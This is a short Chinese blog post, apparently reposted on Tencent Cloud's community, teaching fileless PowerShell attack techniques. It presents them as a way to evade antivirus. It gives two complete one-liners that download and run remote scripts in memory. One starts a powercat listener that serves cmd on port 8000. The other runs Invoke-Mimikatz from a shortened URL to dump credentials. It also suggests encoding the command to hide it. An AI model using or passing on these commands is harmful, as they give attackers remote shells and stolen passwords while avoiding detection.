powershell运行netcat

前言

大家都知道,powershell可以做到在内存中加载运行文件,做到无文件在硬盘上生成。

正文

渗透中大家常用的技巧比如nc监听、mimikatz密码抓取等,今天给大家介绍下利用ps执行nc做到变相免杀。

ps版nc链接如下:

https://github.com/besimorhino/powercat

可以本地执行,也可以远程执行,远程执行命令如下:

powershell "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -l -p 8000 -e cmd"

然后远程连接执行命令即可

当然,如果嫌弃该命令太暴露,可以对其进行编码

mimikatz密码抓取同理

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

  • 发表于:
  • 原文链接http://kuaibao.qq.com/s/20180308G0UT3N00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 yunjia_community@tencent.com 删除。

扫码关注云+社区

领取腾讯云代金券